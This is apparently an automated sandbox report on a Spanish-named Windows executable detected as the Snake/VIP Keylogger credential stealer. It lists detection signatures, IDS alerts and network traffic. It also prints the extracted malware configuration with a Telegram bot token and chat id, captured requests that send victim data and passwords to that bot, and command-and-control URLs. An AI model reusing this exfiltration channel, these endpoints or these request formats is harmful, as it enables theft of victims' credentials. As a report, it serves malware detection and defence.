Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PRESUPUESTO DE NOVIEMBRE...exe

Overview

General Information

Sample name:PRESUPUESTO DE NOVIEMBRE...exe
Analysis ID:1545933
MD5:4cf66de9bfdf5bb65b4151f456db83df
SHA1:8245fc47d7d1833882b90bbd1fe99d13b2335929
SHA256:b07790927beaf1cc2d81cf76f0081c7c264c3133fe71437ca4bd26e220800d43
Tags:exeuser-lowmal3
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot7783218527:AAHN8_CA9nVnpNHtK0tB7lGdN14pvWhfSn8/sendMessage"}
{"Exfil Mode": "Telegram", "Bot Token": "7783218527:AAHN8_CA9nVnpNHtK0tB7lGdN14pvWhfSn8", "Chat id": "8178506397", "Version": "4.4"}
{"Exfil Mode": "Telegram", "Token": "7783218527:AAHN8_CA9nVnpNHtK0tB7lGdN14pvWhfSn8", "Chat_id": "8178506397", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
    00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
      00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
          00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            Click to see the 14 entries
            SourceRuleDescriptionAuthorStrings
            5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                  5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                    2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      Click to see the 27 entries
                      No Sigma rule has matched
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-31T10:35:19.059975+010028033053Unknown Traffic192.168.2.1149780188.114.97.3443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-31T10:35:17.072079+010028032742Potentially Bad Traffic192.168.2.1149708132.226.247.7380TCP
                      2024-10-31T10:35:18.353340+010028032742Potentially Bad Traffic192.168.2.1149708132.226.247.7380TCP
                      2024-10-31T10:35:19.946064+010028032742Potentially Bad Traffic192.168.2.1149786132.226.247.7380TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7783218527:AAHN8_CA9nVnpNHtK0tB7lGdN14pvWhfSn8", "Chat_id": "8178506397", "Version": "4.4"}
                      Source: 5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7783218527:AAHN8_CA9nVnpNHtK0tB7lGdN14pvWhfSn8", "Chat id": "8178506397", "Version": "4.4"}
                      Source: PRESUPUESTO DE NOVIEMBRE...exe.7336.5.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7783218527:AAHN8_CA9nVnpNHtK0tB7lGdN14pvWhfSn8/sendMessage"}
                      Source: PRESUPUESTO DE NOVIEMBRE...exeReversingLabs: Detection: 44%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: PRESUPUESTO DE NOVIEMBRE...exeJoe Sandbox ML: detected

                      Location Tracking

                      barindex
                      Source: unknownDNS query: name: reallyfreegeoip.org
                      Source: PRESUPUESTO DE NOVIEMBRE...exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.11:49774 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:49877 version: TLS 1.2
                      Source: PRESUPUESTO DE NOVIEMBRE...exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: agpG.pdb source: PRESUPUESTO DE NOVIEMBRE...exe
                      Source: Binary string: agpG.pdbSHA256 source: PRESUPUESTO DE NOVIEMBRE...exe
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 4x nop then jmp 0781EABFh2_2_0781EBF7
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 4x nop then jmp 0300F45Dh5_2_0300F2C0
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 4x nop then jmp 0300F45Dh5_2_0300F4AC
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 4x nop then jmp 0300FC19h5_2_0300F970
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 4x nop then jmp 05C131E0h5_2_05C12DC2
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 4x nop then jmp 05C131E0h5_2_05C12DC8
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 4x nop then jmp 05C1D7F9h5_2_05C1D550
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 4x nop then jmp 05C1CF49h5_2_05C1CCA0
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 4x nop then jmp 05C1F209h5_2_05C1EF60
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 4x nop then jmp 05C1E959h5_2_05C1E6B0
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 4x nop then jmp 05C1E0A9h5_2_05C1DE00
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 4x nop then jmp 05C1DC51h5_2_05C1D9A8
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 4x nop then jmp 05C12C19h5_2_05C12968
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 4x nop then jmp 05C131E0h5_2_05C1310E
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 4x nop then jmp 05C1D3A1h5_2_05C1D0F8
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_05C10040
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 4x nop then jmp 05C1FAB9h5_2_05C1F810
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 4x nop then jmp 05C1F661h5_2_05C1F3B8
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 4x nop then jmp 05C1EDB1h5_2_05C1EB08
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 4x nop then jmp 05C10D0Dh5_2_05C10B30
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 4x nop then jmp 05C11697h5_2_05C10B30
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 4x nop then jmp 05C1E501h5_2_05C1E258

                      Networking

                      barindex
                      Source: unknownDNS query: name: api.telegram.org
                      Source: Yara matchFile source: 5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, type: UNPACKEDPE
                      Source: global trafficHTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:103386%0D%0ADate%20and%20Time:%2001/11/2024%20/%2001:21:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20103386%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7783218527:AAHN8_CA9nVnpNHtK0tB7lGdN14pvWhfSn8/sendDocument?chat_id=8178506397&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfa7be7f62c54Host: api.telegram.orgContent-Length: 578
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                      Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                      Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
                      Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: checkip.dyndns.org
                      Source: unknownDNS query: name: reallyfreegeoip.org
                      Source: unknownDNS query: name: reallyfreegeoip.org
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49786 -> 132.226.247.73:80
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49708 -> 132.226.247.73:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49780 -> 188.114.97.3:443
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.11:49774 version: TLS 1.0
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:103386%0D%0ADate%20and%20Time:%2001/11/2024%20/%2001:21:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20103386%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                      Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                      Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                      Source: unknownHTTP traffic detected: POST /bot7783218527:AAHN8_CA9nVnpNHtK0tB7lGdN14pvWhfSn8/sendDocument?chat_id=8178506397&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfa7be7f62c54Host: api.telegram.orgContent-Length: 578
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 31 Oct 2024 09:35:34 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003328000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: PRESUPUESTO DE NOVIEMBRE...exeString found in binary or memory: http://tempuri.org/DataSet1.xsd
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003209000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003209000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003209000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003209000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:103386%0D%0ADate%20a
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7783218527:AAHN8_CA9nVnpNHtK0tB7lGdN14pvWhfSn8/sendDocument?chat_id=8178
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000032BA000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000032EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000032B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB_q
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
